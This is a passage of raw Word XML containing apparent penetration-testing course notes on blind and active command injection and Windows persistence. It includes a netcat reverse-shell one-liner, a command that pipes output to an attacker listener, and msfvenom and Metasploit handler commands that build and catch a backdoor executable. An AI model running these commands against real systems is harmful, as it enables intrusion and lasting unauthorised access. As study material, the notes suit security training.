        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>; ping -c 10 &lt;attacker ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0CC8E8" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Bypassing the Blind Injection with Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27841438" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pipe output of a command to an nc listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11087B11" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>root; ls -la | nc {VPN_IP} {PORT}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D660309" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>To determine Linux Kernel version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8F2B2A" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>prep netcat listener on attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1877BB42" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc &lt;ip&gt; 1234 &gt;/tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44579404" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>inside victim box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED62A67" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2925A02A" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enter “root”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237E30B8" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enter www-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1FC4EE" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Active Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD2C03E" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>will return response to the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C25E5EF" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can be made visible through several HTML elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F2F2BD" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>passthru()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57573299" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Ways to Detect Active Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CEDAD" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0776D460" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BE2822" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E16A892" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ifconfig/ip addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064DCB93" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71877468" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ps -ef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489A7D9" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF92997" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>lsb_release -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD6623" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21043637" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A0AC3B" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC1B83" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B866C0" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124ABEC0" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>tasklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58848DE9" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>netstat -an</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70450C64" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F955FC" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D40AA9" w14:textId="1A3A2A6B" w:rsidR="00AA747C" w:rsidRDefault="00372B36" w:rsidP="006D36AB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D5ADE" w14:textId="7329DD11" w:rsidR="00C21E6C" w:rsidRDefault="00C21E6C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2812C9EA" w14:textId="5107FFF2" w:rsidR="00C21E6C" w:rsidRDefault="00C21E6C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>post-exploitation activity to maintain access to systems throughout whole assessment and avoid re-exploitation regardless of system restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF2CCBE" w14:textId="64277E41" w:rsidR="00C21E6C" w:rsidRDefault="00C21E6C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Two Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A237C3F" w14:textId="2079F07E" w:rsidR="00C21E6C" w:rsidRDefault="00C21E6C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Low Privileged Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010BE22D" w14:textId="21DACC74" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>no admin rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15478CEB" w14:textId="61E251C3" w:rsidR="00C21E6C" w:rsidRDefault="00C21E6C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Privileged User Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42678B98" w14:textId="4C7BD7D1" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nt authority/system on Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46134351" w14:textId="29B9A88C" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Keeping Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5283BC67" w14:textId="3555150F" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Startup Folder Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C15BC8A" w14:textId="7C1752E4" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Editing Registry Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D3EC57" w14:textId="5E079CBB" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Using Scheduled Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65148913" w14:textId="0DF64BF0" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Using BITS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCBFB1F" w14:textId="271F5FBA" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Creating a Backdoor Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A82601" w14:textId="0178C189" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Creating Another User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A54B49" w14:textId="50EB4CB3" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Backdooring RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEA44AB" w14:textId="5F4E932D" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Low Privileged User Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6471100B" w14:textId="3AB9692C" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Create a Metasploit backdoor using msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76048D9B" w14:textId="5CDB6CFD" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp &lt;LHOST&gt; &lt;LPORT&gt; -f exe &gt; backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F10FC8" w14:textId="50969F04" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Create a Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F4B33" w14:textId="5984A137" w:rsidR="00F072C8" w:rsidRDefault="00F072C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5029AB5F" w14:textId="59327E0D" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011A8ED2" w14:textId="042BCE1F" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8F3C3A" w14:textId="5FA2E60D" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set LHOST &lt;attacker IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076070AB" w14:textId="039CFD4F" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set LPORT &lt;same port as exploit&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AE5FFE" w14:textId="68FAAFAE" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7432A74F" w14:textId="3D490CB4" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Deliver exploit via SimpleHTTPServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36791980" w14:textId="4E369695" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Internet Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3BC080" w14:textId="59BA8381" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Internet Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6353E0AD" w14:textId="4B0881C3" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Security Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206703E9" w14:textId="01FD916A" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Trusted Sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C04B99" w14:textId="6E26EAE6" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sites</w:t>
      </w:r>
    </w:p>
